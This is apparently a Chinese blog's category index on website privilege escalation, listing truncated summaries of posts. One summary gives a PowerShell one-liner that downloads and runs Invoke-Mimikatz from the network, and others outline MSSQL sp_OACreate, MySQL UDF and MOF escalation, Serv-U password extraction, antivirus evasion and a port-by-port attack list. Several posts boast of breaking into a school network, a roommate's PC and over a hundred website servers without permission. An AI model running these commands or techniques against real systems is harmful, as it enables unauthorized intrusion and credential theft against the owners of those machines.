随笔分类 - 网站提权
摘要:powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimi
阅读全文
摘要:数据库root权限。然并卵。 看了一下phpinfo得知是mysql 5.0 的 然后想要通过udf之类的提权一波,结果一执行sql语句就被狗拦截了。 然而数据库这条路是GG了 然后各种exp瞎jb上 刚开始全都GG了。执行一下tasklist /svc你就知道了。 直接免杀一波团。 然而上去了还是
阅读全文
摘要:https://github.com/SecWiki/linux-kernel-exploits
阅读全文
摘要:在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权 首先 EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automa
阅读全文
摘要:废话 之前还真没成功过,但今天不小心日一个垃圾站的时候成功了。 思路 先创建一个用户(普通权限即可)然后使用exp日完狗拍屁股走人。 然后查看一下所在用户组依旧还是在users,但其实已经提下。 EXP:http://files.cnblogs.com/files/xishaonian/UserCl
阅读全文
摘要:1.运行环境 cmd 窗口中运行这些命令 2. DOS 命令 查看版本:ver 查看权限:whoami tangyuan-pc 只是用户,这的 lizi 是管理员权限(一般电脑上的叫:Administrator) 在服务器中进行提权(以后会讲怎么提权),一般权限都是 user 的普通权限,或者是 g
阅读全文
摘要:废话: 今天本来日学校内网。以为是台08.结果稀里糊涂居然日了宿舍哥们儿的PC机。按道理都该装杀毒的才对,我舍友都不装的。裸装上阵说的就是我舍友了。劝各位大佬。把杀毒装好。补丁打好。 通过这次我也学到了以下几个msf提权相关的命令: 切换到另一个用户界面(该功能基于那些用户已登录)。 screens
阅读全文
摘要:mof提权的原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定
阅读全文
摘要:文章比较简单,只是做一个科普。给一个好朋友的。 倘若口令更改了大家可以去serv-u的目录(默认路径:C:\Program Files\Serv-U\)找其配置文件(ServUDaemon.ini),在配置文件中有其密码。 webshell里默认的执行。如下操作: THE END
阅读全文
摘要:00x1 故事是这样发生的 直接上菜刀。 找个地儿随便上传个exp。稀里哗啦随便点目录。觉得还是权限蛮大的。上传个cmd再说。 这就尴尬了。 然后又多找几个地儿的试了试。终于OK。 虚拟机,EXP轻松秒之。不过呢,低调。 GETPASS 后来那个哥们儿跟我说 安全狗?为啥我的pr都不杀?难道我的免杀
阅读全文
摘要:/* 转载请注明出处 ID:珍惜少年时 */ 21 FTP //找到其FTP目录,破解其密码搜索,提之 22 linux终端 23 telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433 mssql提权 //需要找到sa密码,一般存在于web.config
阅读全文
摘要:菜刀下默认执行效果 此脚本测试效果
阅读全文
摘要:1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp
阅读全文
摘要:00x1 首先判断mysql版本, mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/ mysql版本 > 5.2 ,UDF导出到安装路径MySQL\Lib\Plugin\ 一般Lib、Plugin文件夹需要手工建立(可用流模式突破进而创建文件夹) 可能会用
阅读全文
摘要://觉得很典型的案例,就转载过来了。很多时候phpmyadmin都需要路劲才能写shell。否则拿到了myadmin也是无奈。 查看mysql版本 版本是5.1 大家都知道mysql udf提权 5.0以下的要导出到c:\windows\或者c:\windows\system32目录下 而5.1必须
阅读全文
摘要:手提liu百多个黄色网站De服务器。 #继昨晚之后再一次提下一个08r2服务器,这次实属不易从下午一两点到方才现在约晚上十一点,学到新姿势了,心情还是很不错的。故事是这样的,六点多钟睡觉的我,到了九点钟,还是翻来覆去想日站。行吧,起床!日站走起。 逼装完了,说过程吧。拿shell其实才是技术活,但并
阅读全文
摘要:事前日下这个站的时候说实话,略微的蛋疼。其过程就不写了,就讲讲提权吧。可能图片有点暗。看看我写这篇文章的时候就知道了。 这个学校我好多同学在里面读书,就萌生了。日下这个站的想法。 拿到shell,理所应当的是收集信息了。 2008r2的,哇靠哦。我第一反应就是再看看端口,因为一般08r2的exp能用
阅读全文
